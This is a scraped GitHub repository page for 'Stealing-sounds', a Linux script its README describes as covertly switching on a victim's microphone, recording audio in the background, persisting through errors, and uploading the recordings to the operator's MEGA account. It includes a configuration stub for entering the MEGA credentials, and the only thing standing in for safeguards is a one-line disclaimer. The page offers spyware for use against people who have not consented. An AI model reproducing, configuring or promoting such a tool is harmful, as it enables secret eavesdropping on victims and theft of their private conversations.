Skip to content

The script turns on the microphone to record audio from the victim's device and sends it to the MEGA website in an audio document format.

Notifications You must be signed in to change notification settings

0x802/Stealing-sounds

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 

Repository files navigation

Stealing-sounds

The script turns on the microphone to record audio from the victim's device and sends it to the MEGA website in an audio document format


  • Requirements change in the script:
class Upload(object):
    def __init__(self):
        self.up         = Mega()
        self.user       = 'Your Email Address' # Your Email in Mega.nz
        self.password   = 'Your Password' # Your Password in Mega.nz

  • Works only when online
  • Works only in linux system.
  • Divides audio segments into semi - finished and transmitted segments to facilitate transmission
  • Works behind the scenes
  • Does not stop if any unexpected error occurs

We disclaim responsibility for how we use the software

About

The script turns on the microphone to record audio from the victim's device and sends it to the MEGA website in an audio document format.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages